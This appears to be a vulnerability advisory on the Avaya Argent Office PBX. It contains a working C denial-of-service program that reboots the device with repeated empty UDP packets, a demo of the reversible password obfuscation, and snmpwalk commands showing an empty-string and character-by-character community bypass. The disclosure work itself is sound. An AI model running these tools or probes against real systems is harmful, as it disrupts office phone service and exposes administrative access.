COMMAND

    Argent Office

SYSTEMS AFFECTED

    Avaya Argent Office

PROBLEM

    Jacek Lipkowski found  following.  The  Argent branch of  products
    (now known  as Network  Alchemy line)  from Avaya  are a  solution
    integrating a PBX, network connectivity, dial on demand networking
    etc.   Jacek  had  some  security  concerns  when he looked at it.
    Since all of them are only possible on a local network (and  since
    this  system  is  designed  for  small offices), they shouldn't be
    much of a problem.

    Local denial of service
    =======================
    By sending an  udp packet to  port 53 with  no payload the  Argent
    Office reboots.   The unit gets  up very quickly  so one needs  to
    send the packets repeatedly. Sample source code below:

    /* argent_kill.c
    (c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
    Reboots an Argent Office box by sending udp packets with no payload to port 53
    usage: argent_kill ip_address
    */
    
    #include <stdio.h>
    #include <string.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <unistd.h>
    
    main(int argc, char *argv[])
    {
    struct sockaddr_in addr;
    struct hostent *host;
    int s;
    
    s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (s==-1) { perror("socket()"); exit(1); }
    host=gethostbyname(argv[1]);
    if (host==0) { herror("gethostbyname"); exit(1); }
    memcpy(&addr.sin_addr,host->h_addr,host->h_length);
    addr.sin_port=htons(53);
    addr.sin_family=AF_INET;
    if (connect(s,&addr,16)==-1) { perror("connect()"); exit(1); }
    for (;;)
    {
    send(s,0,0,0); sleep(1); printf("."); fflush(stdout);
    }
    close(s);
    }

    Easily decryptable configuration password
    =========================================
    Configuring Argent Office consists  of a strange tftp  look-alike.
    For example to reboot a unit  one must get via tftp the  following
    file:

        nasystem/rebootwhenfree/00e007002666/password//

    Where 00e007002666 is the MAC address of the unit and password  is
    the obfuscated password.  Since this packet is easily sniffed  and
    the obfuscation  algorithm doesn't  change, anyone  with a sniffer
    can  easily  obtain  administrative  privliges.   The  obfuscation
    mechanism is rather simple, as the following example demonstrates:

    /* argent_obfuscate.c
    (c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
    demonstrates how the password obfuscation
    mechanism works in argent office products */
    
    main(int argc,char **argv)
    {
    int i;
    unsigned char buf[32];
    strcpy(&buf,argv[1]);
    for (i=0;i<strlen(argv[1]);i++)
    printf("0x%2.2X ",buf[i]+0x11-i);
    printf("\n");
    }

    Show the hex values for the password 'idiocy':

        ~$ ./argent_obfuscate idiocy
        0x7A 0x74 0x78 0x7D 0x70 0x85

    Writing  a  decryption  routine  is  left  as  an excercise to the
    reader.

    Dumb SNMP handling
    ==================
    This is a really good one!  The software does snmp  authentication
    via something similar to:

        if (strncmp(n,c,strlen(n))==0) { ok, valid community}

    Where c is the community string and n is the community string from
    the network.

    So basically if the size of  the password in the packet is  0 then
    the authentication is OK.

        ~$ snmpwalk 192.168.1.234 "" system.sysDescr.0
        system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

    You could also guess the community string character by character.

    Guess the first letter:

        ~$ snmpwalk 192.168.1.234 a system.sysDescr.0
        Timeout: No Response from 192.168.1.234
        [the first letter is not a]
        [several combinations later, is it p?]
        ~$ snmpwalk 192.168.1.234 p system.sysDescr.0
        system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
        
        [ok we have the first letter, lets go for the second]
        ~$ snmpwalk 192.168.1.234 pa system.sysDescr.0
        Timeout: No Response from 192.168.1.234
        [the second letter is not a]
        [several combinations later, is it r?]
        ~$ snmpwalk 192.168.1.234 pr system.sysDescr.0
        system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
        
        etc... (the community is 'private')

    While not much is gained by using snmp, the community may be  some
    company standard, and knowing it may open other doors.

    Broadcast tftp requests
    =======================
    The system in it's default config requests a file called HoldMusic
    via tftp to  the broadcast address.  You could probably  serve the
    file and  change your  company's music  on hold  tune to something
    more interesting.

    All these  vulnerabilities can  be excercised  only from  internal
    interfaces  (haven't  found  a  way  to  kill  it  from the dialup
    interface), so the impact is usually minor (the local staff  could
    lauch a much more destructive  dos attack using a hammer),  unless
    your network is public or has other entry points.

SOLUTION

    Nothing yet.